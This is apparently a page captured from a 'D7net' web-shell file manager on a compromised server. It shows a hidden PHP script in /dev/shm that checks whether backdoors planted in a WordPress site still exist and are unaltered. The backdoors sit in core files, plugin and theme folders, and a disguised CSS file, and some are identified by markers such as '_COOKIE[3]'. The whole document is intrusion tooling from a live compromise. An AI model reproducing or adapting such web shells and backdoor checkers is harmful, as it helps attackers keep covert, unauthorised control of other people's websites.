D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.resource
back
Copy
<?php $r = '/home/ideadpfc/ideacadecom.shop'; $x = ["/wp-content/plugins/svg-favicons/vendor/composer/autoload.check.php"=>"bd@@25096@@535", "/wp-content/themes/hello-animations/assets/css/CryptUtil.php"=>"bd@@19984@@2123", "/wp-admin/about.php"=>"bd@@84350@@task_processor", "/wp-admin/includes/options.php"=>"bd@@29066@@module_controller", "/wp-content/plugins/svg-favicons/assets/js/jpgraph_gb2312.php"=>"bd@@23947@@1528", "/wp-blog-header.php"=>"bd@@29067@@_COOKIE[3]", "/wp-admin/includes/class-language-pack-upgrader.php"=>"bd@@29069@@_COOKIE[3]", "/wp.blog.php"=>"bd@@29070@@643", "/wp-admin/js/horiz.php"=>"bd@@17566@@535", "/wp-admin/js/top_1746432728.php"=>"bd@@16598@@1049", "/wp-content/themes/hello-animations/assets/scss/HTML_toolbar.php"=>"bd@@83933@@650", "/wp-admin/upgrade-functions.php"=>"bd@@24797@@initialized", "/wp-content/plugins/svg-favicons/inc/classes/traits/home_new.php"=>"bd@@19958@@604", "/wp-admin/install-helper.php"=>"bd@@18935@@_COOKIE[3]", "/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/product-number-field/diag.css"=>"ui@@489@@6762", "/wp-includes/rest-api/class-wp-rest-request.php"=>"ui@@489@@diag.css"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');